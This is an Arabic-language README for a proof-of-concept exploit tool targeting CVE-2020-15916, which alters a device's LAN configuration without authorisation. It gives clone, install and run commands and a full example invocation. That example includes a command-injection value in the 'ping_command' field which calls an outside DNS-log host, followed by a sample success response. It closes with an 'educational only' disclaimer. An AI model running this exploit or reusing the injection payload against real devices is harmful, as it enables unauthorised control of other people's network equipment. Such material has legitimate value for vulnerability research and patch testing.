
هذا المشروع هو إثبات مفهوم (PoC) لاستغلال CVE-2020-15916، وهي ثغرة تسمح بإجراء تغييرات غير مصرح بها على تكوين الشبكة المحلية (LAN) لجهاز.
GenLANConfigAttack - هو إثبات مفهوم (PoC) لاستغلال CVE-2020-15916، وهي ثغرة أمنية تسمح بإجراء تغييرات غير مصرح بها على تكوين LAN لجهاز.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: عنوان IP للجهاز المستهدف.ping_command: الأمر المطلوب تنفيذه على الجهاز المستهدف.session_password: كلمة مرور الوصول إلى الجلسة.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[الاستجابة من 192.168.0.1]:
{"success":true,"message":"تم تحديث تكوين LAN IP بنجاح"}
إثبات المفهوم هذا مخصص للثغرة الأمنية CVE-2020-15916، والتي تسمح للمهاجمين بتغيير تكوين LAN للأجهزة المعرضة للخطر من خلال استغلال آلية مصادقة ضعيفة.
هذه الأداة مقدمة لأغراض تعليمية فقط. استخدمها بمسؤولية وفقط في البيئات التي لديك إذن صريح بها.